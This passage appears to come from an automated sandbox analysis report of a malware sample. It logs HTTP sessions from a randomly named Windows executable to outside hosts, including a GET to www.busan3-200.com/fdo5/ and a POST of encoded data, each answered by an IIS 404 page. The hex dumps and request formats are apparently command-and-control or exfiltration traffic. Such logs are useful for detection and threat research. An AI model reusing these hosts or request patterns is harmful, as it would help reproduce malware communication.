                                                                                              Data Raw: 35 34 30 48 32 78 3d 6c 37 59 79 70 6c 6e 31 6a 34 5a 52 69 38 4a 65 68 45 79 64 71 71 33 59 78 46 74 4d 67 57 47 77 51 52 6b 4d 6c 74 4c 41 47 35 57 41 41 6c 6e 45 2f 6f 6b 34 78 6e 72 73 55 47 4f 51 31 63 75 65 32 63 4d 39 4b 51 48 2b 37 75 63 6d 52 52 48 55 4b 52 31 53 6b 68 44 36 65 52 39 68 48 36 61 7a 42 4b 52 4d 57 57 63 6e 79 79 66 35 49 79 61 45 58 31 35 57 69 54 52 47 6b 70 61 59 4b 56 31 74 2f 64 67 4c 54 65 63 74 62 6c 36 51 43 46 37 58 6e 37 2f 2b 2b 54 51 48 38 53 71 66 78 78 63 54 64 68 35 66 53 67 42 76 78 51 38 6b 69 41 55 47 54 37 2b 4b 32 73 38 69 42 47 69 4b 6a 44 70 72 74 6a 59 45 68 31 73 70 57 5a 44 55 79 45 50 4e 43 4d 6f 49 78 56 71 30 75 63 4e 33 35 56 5a 33 5a 6b 63 57 66 31 53 57 7a 6e 71 6d 78 50 72 51 61 69 52 50 6e 63 52 71 75 43 51 58 39 69 42 35 76 30 4b 75 6f 48 63 58 50 50 30 7a 6e 78 4a 59 65 30 2f 49 42 6c 5a 36 45 73 36 65 39 52 45 31 57 79 50 70 36 65 41 47 71 37 49 72 70 4b 43 57 34 46 2b 49 55 2f 61 50 69 50 4f 43 57 67 63 6b 41 36 44 68 74 30 7a 70 4c 5a 34 32 79 35 2b 66 32 4c 6e 74 53 55 74 43 35 31 62 68 38 79 72 77 64 6e 43 36 53 33 43 79 4a 7a 50 41 4d 50 38 6b 54 68 4b 46 6a 64 72 74 2f 49 46 57 6f 74 75 4e 59 30 4f 52 38 55 4b 58 4f 6f 45 6b 37 5a 6d 32 4b 59 76 34 2b 43 43 31 7a 54 52 52 47 58 6c 4d 30 2b 67 71 2b 39 44 6b 48 2b 5a 79 54 75 50 48 42 75 56 32 4a 5a 4c 65 31 44 71 63 31 50 72 4b 31 46 44 6a 41 44 47 32 4a 39 51 68 76 58 47 35 31 4b 48 34 5a 2f 4f 2f 75 36 52 4d 75 4d 59 4d 62 45 31 36 4d 5a 5a 44 53 66 72 70 52 6b 49 4f 4f 38 57 42 70 36 66 65 6e 78 77 35 66 54 4f 31 56 31 4f 77 64 66 41 49 6d 65 42 51 62 39 75 73 44 7a 74 4c 45 2f 6b 65 33 61 57 72 4b 62 78 34 73 4c 2f 67 51 4e 78 50 66 31 41 4d 4f 64 68 47 70 59 46 64 35 39 48 4a 44 2b 67 4b 51 4c 46 48 50 62 5a 73 65 6b 34 30 6f 4f 4d 44 34 6c 75 79 6e 6e 76 6e 33 71 33 4e 65 32 37 30 46 73 71 74 6d 33 2b 52 58 6c 54 7a 32 4e 35 5a 62 32 30 5a 4f 57 5a 64 69 49 46 5a 46 35 39 55 50 76 76 61 68 32 76 4d 6f 6b 4f 58 51 45 69 51 57 36 57 6f 33 77 65 4b 49 69 4d 2b 53 6c 69 46 5a 4d 71 77 62 77 41 5a 61 69 67 50 53 35 51 54 70 4d 5a 38 34 49 69 65 62 65 58 36 54 77 69 59 4b 52 6c 30 76 6e 71 4c 63 76 30 37 71 63 52 38 52 47 4b 4f 50 39 50 64 4d 62 4f 6d 72 38 42 4c 55 6a 69 45 2f 74 44 4e 48 47 67 48 6c 58 4a 6b 65 36 7a 4f 42 2b 74 71 70 53 48 50 4e 79 79 4c 4b 6e 78 6a 5a 4a 37 4a 78 42 72 50 4f 70 66 4a 48 70 71 73 63 2b 4c 45 4b 67 2b 33 78 7a 32 41 6b 6c 4a 30 6f 77 70 62 49 5a 64 36 33 39 54 51 35 51 53 54 6b 62 66 6e 68 30 6e 4f 67 74 36 59 6e 6b 6b 45 35 45 74 6e 4c 42 45 62 47 69 67 35 56 44 2b 4a 75 39 6b 78 47 44 4a 66 31 41 73 6d 71 4f 62 6e 66 66 6a 35 76 64 30 75 79 69 74 6b 52 58 63 39 4f 5a 4d 5a 48 4b 53 4d 4e 68 62 56 43 39 46 48 53 73 44 58 31 50 38 38 6f 2b 51 4b 79 41 6f 6a 6b 39 52 46 4a 63 41 6a 71 39 31 31 61 68 4d 79 5a 79 59 44 4b 68 63 47 4a 4d 30 75 4b 38 34 73 76 66 56 6f 32 35 62 31 48 6a 5a 4f 73 58 6c 75 48 41 4d 71 63 53 53 6b 59 77 64 36 41 66 6e 71 48 57 64 35 72 73 51 58 43 31 48 2f 46 6a 4c 51 50 6a 50 77 34 6a 67 39 42 4b 6e 5a 2b 31 2b 6d 59 51 38 64 73 39 30 62 73 6b 6c 49 54 33 39 47 45 31 58 41 6c 57 46 78 56 38 74 79 47 2f 5a 6a 4b 4b 2b 48 55 42 76 32 54 36 7a 73 62 35 58 4c 49 74 34 64 78 45 5a 47 68 56 38 4b 38 4b 57 45 79 46 53 4e 44 45 4c 7a 44 53 51 75 6c 62 71 44 55 76 2f 50 54 47 6a 64 4b 4b 4e 68 54 49 37 65 2b 57 66 44 37 58 6d 4c 2b 31 63 59 53 30 37 41 66 66 4a 64 38 43 71 6d 67 5a 39 6d 74 6b 6c 65 48 63 71 72 51 36 44 4a 66 6f 35 37 31 75 4a 69 5a 73 49 41 5a 51 59 68 69 2b 36 72 69 33 2f 51 4b 6d 33 7a 41 6e 47 7a 34 39 71 79 56 66 56 7a 4f 37 33 43 72 49 7a 39 48 77 78 36 6b 55 45 75 4f 64 54 49 4b 50 57 41 48 59 4a 49 52 4d 76 51 58 56 63 71 61 6d 33 69 70 53 33 2f 64 56 72 58 6c 64 6e 42 2f 67 4b 5a 48 71 5a 55 65 2f 68 54 5a 63 5a 67 4e 52 50 65 50 74 79 73 51 77 63 6d 6f 50 71 68 43 46 53 6f 66 74 68 30 68 63 77 6c 54 45 55 62 63 54 6b 63 42 52 2f 2f 50 51 66 6e 4b 2f 65 43 48 57 62 56 77 4c 57 78 5a 41 56 73 4f 78 44 52 53 6e 37 6a 72 35 4c 51 58 69 68 55 71 6c 4a 31 6a 44 74 41 42 73 70 61 62 48 4d 2b 48 45 66 56 4d 6b 58 74 4d 45 68 2b
                                                                                              Data Ascii: 540H2x=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
                                                                                              Dec 3, 2023 16:27:04.399122000 CET3110OUTData Raw: 32 4a 68 6c 39 59 51 31 52 4c 75 71 7a 59 65 66 68 35 36 79 33 75 4f 58 2f 44 4a 2b 34 76 6d 73 39 2f 56 46 44 4c 4c 48 47 36 39 69 32 55 42 66 6b 6c 2b 35 6f 75 45 6a 65 49 56 61 52 6e 7a 43 36 4e 75 71 35 4b 74 30 68 49 5a 63 2f 33 73 45 77 6e
                                                                                              Data Ascii: 2Jhl9YQ1RLuqzYefh56y3uOX/DJ+4vms9/VFDLLHG69i2UBfkl+5ouEjeIVaRnzC6Nuq5Kt0hIZc/3sEwn0F3O4V2dNsBLZlGUiZvG+jpIe6Gj5hA6Ww+20QMS0zD40puZHsKJlIP6dK2m2iYj7Md7HI3RB+S/SfzLHPiDO0AYDsXPkGYCGCP0fHM4nX8aAREamDAg0TJvAoaeK4JcTlD8T3ZAIfkPDBTFqpCgAr2o4FgDFnr2l
                                                                                              Dec 3, 2023 16:27:04.665920019 CET1340INHTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:27:04 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4857
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
                                                                                              Dec 3, 2023 16:27:04.665935993 CET1340INData Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a
                                                                                              Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
                                                                                              Dec 3, 2023 16:27:04.665949106 CET1340INData Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e
                                                                                              Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
                                                                                              Dec 3, 2023 16:27:04.665966034 CET1271INData Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71
                                                                                              Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x8007000


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.44975652.68.224.126802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:06.930078983 CET461OUTGET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=o5wSqUvF0rpSj/QsxVSIlr771lB1q2yaUHYHmevxRJiNXHXH1dMi1Tu8dx6k0Oesk6U+KD/q+MB1YEvRLC9XlweWTzImNrywBQ== HTTP/1.1
                                                                                              Host: www.busan3-200.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:27:07.195202112 CET1340INHTTP/1.1 404 Not Found
                                                                                              Cache-Control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Server: Microsoft-IIS/8.5
                                                                                              X-Powered-By: ASP.NET
                                                                                              Date: Sun, 03 Dec 2023 15:27:07 GMT
                                                                                              Connection: close
                                                                                              Content-Length: 4990
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 